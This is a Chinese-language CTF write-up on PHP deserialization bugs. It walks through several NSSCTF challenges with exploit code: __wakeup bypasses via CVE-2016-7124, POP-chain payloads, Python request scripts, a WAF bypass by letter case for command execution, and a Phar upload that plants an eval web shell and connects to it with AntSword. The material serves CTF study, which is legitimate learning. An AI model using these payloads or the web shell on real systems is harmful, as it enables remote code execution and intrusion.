Web入门-PHP反序列化漏洞

[SWPUCTF 2021 新生赛]no_wakeup

反序列化时触发__wakeup函数,考虑绕开。

1
2
3
4
5
$aa = new HaHaHa();
$aa->admin = "admin";
$aa->passwd = "wllm";
$stus = serialize($aa);
print_r($stus); //O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

CVE-2016-7124:当参数列表中成员个数与实际不符时绕过__wakeup函数,构造:

1
O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

payload:

1
2
3
import requests
response=requests.get('http://node4.anna.nssctf.cn:28398/class.php?p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}')
print(response.text[-44:])

[SWPUCTF 2021 新生赛]pop

找链子打。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
    class w44m{
        private $admin='w44m';
        protected $passwd='08067';
    }
    class w22m{
        public $w00m;
    }
    class w33m{
        public $w00m;
        public $w22m;
    }
    $a=new w22m();
    $b=new w33m();
    $c=new w44m();
    $a->w00m=$b;
    $b->w00m=$c;
    $b->w22m='Getflag';
    echo urlencode(serialize($a));
?>

exp:

1
2
3
import requests
response1=requests.get('http://node5.anna.nssctf.cn:28507/index.php?w00m=O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D')
print(response1.text[-44:])

[HUBUCTF 2022 新生赛]checkin

弱比较,true跟谁比都为true。

1
2
3
4
5
6
7
8
<?php
    $a=array(
        'username'=>true,
        'password'=>true
    );
    $b=serialize($a);
    echo $b;
?>

payload:

1
http://node5.anna.nssctf.cn:28305/?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}

[NISACTF 2022]babyserialize

PHP魔术方法:

__wakeup()unserialize被调用时。

__call():调用不可访问或不存在的方法。

__toString():类被转换成字符串。

__invoke():以函数方式调用对象。

__set():给不可访问或不存在属性赋值。

有俩坑:$fun必须改为别的,要不总是进入hint();命令执行有WAF,可大小写绕过。

1
2
3
4
5
6
7
8
$payload=new TianXiWei();
$payload->ext=new Ilovetxw();
$payload->ext->huang=new four();
$payload->ext->huang->a=new Ilovetxw();
$payload->ext->huang->a->su=new NISA();
$payload->ext->huang->a->su->fun="asdf";
$payload->ext->huang->a->su->txw4ever='System("cat /fllllllaaag");';
echo(urlencode(serialize($payload)));

[NISACTF 2022]bingdundun~

构造Phar,打包后.phar文件其实就是个类似.jar的压缩文件,里面有个67.php,内容为payload:

1
2
3
4
5
6
7
8
<?php
    $payload='<?php @eval($_POST["cmd"]);?>';
    $phar=new Phar("/home/monoceros406/Desktop/CTF-Workbench/example.phar");
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER();?>");
    $phar->addFromString("67.php","$payload");
    $phar->stopBuffering();
?>

Phar伪协议不看后缀名,可改成.zip上传,伪协议看setStub的内容来识别。

上传后访问:

1
http://node5.anna.nssctf.cn:28678/?bingdundun=phar://0f2c819eaf2a6ec7a8b16be40c7413e5.zip/67.php

Antsword连即可。

[SWPUCTF 2022 新生赛]1z_unserialize

1
nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}

[SWPUCTF 2022 新生赛]ez_ez_unserialize

反序列化构造过长链子绕过__wakeup,exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
    class X{
        public $x = __FILE__;
        function __construct($x){
            $this->x = $x;
        }
        function __wakeup(){
            if ($this->x !== __FILE__) {
                $this->x = __FILE__;
            }
        }
        function __destruct(){
            highlight_file($this->x);
        }
    }
    $a=new X("fllllllag.php");
    echo(urlencode(serialize($a)));
?>

更改类“X”的长度更大,而不是更改类的个数,即更改大括号前的数字。

[NISACTF 2022]popchains

protected型变量直接类内赋值。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<?php
    class Road_is_Long{
        public $page;
        public $string;
        public function __construct($file='index.php'){
            $this->page = $file;
        }
        public function __toString(){
            return $this->string->page;
        }
        public function __wakeup(){
            if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
                echo "You can Not Enter 2022";
                $this->page = "index.php";
            }
        }
    }
    class Try_Work_Hard{
        protected  $var="/flag";
        public function append($value){
            include($value);
        }
        public function __invoke(){
            $this->append($this->var);
        }
    }
    class Make_a_Change{
        public $effort;
        public function __construct(){
            $this->effort = array();
        }
        public function __get($key){
            $function = $this->effort;
            return $function();
        }
    } 
    $payload1=new Road_is_Long();
    $payload1->page=new Road_is_Long();
    $payload1->page->string=new Make_a_Change();
    $payload1->page->string->effort=new Try_Work_Hard();
    echo(urlencode(serialize($payload1)));
?>

[第五空间 2021]pklovecloud

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
    include 'flag.php';
    class pkshow{
        function echo_name(){
            return "Pk very safe^.^";
        }
    }
    class acp{
        protected $cinder;
        public $neutron;
        public $nova;
        function __construct(){
            $this->cinder=new ace;
        }
        function __toString(){
            if(isset($this->cinder))
                return $this->cinder->echo_name();
        }
    }
    class ace{
        public $filename="../nssctfasdasdflag";
        public $openstack;
        public $docker=NULL;
        function echo_name(){
            $this->openstack=unserialize($this->docker);
            $this->openstack->neutron=$heat;
            if($this->openstack->neutron===$this->openstack->nova){
                $file="./{$this->filename}";
                if(file_get_contents($file)){
                    return file_get_contents($file);
                }
                else{
                    return "keystone lost~";
                }
            }
        }
    }
    $payload1=new acp();
    echo(urlencode(serialize($payload1)));
?>